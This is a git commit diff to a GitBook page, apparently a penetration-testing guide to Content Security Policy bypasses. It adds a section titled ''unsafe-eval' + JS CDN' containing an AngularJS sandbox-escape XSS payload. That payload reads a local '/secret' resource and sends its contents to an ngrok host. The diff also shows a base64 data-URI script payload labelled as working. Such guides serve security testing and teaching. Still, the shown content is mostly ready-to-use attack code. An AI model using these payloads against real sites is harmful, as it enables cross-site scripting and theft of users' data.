GitBook: [master] one page modified
This commit is contained in:
parent
7410f8b79e
commit
1a94e081a3
@ -95,6 +95,13 @@ report-uri /Report-parsing-url;
|
||||
|
||||
Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
|
||||
|
||||
### 'unsafe-eval' + JS CDN
|
||||
|
||||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
|
||||
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){if (z.responseText) location="http://af4255a9ed70.ngrok.io?a="+btoa(unescape(encodeURIComponent(z.responseText)))};z.open("GET","http://127.0.0.1/secret",false);z.send();//');}} </div>
|
||||
```
|
||||
|
||||
### Wildcard
|
||||
|
||||
```text
|
||||
|
Loading…
Reference in New Issue
Block a user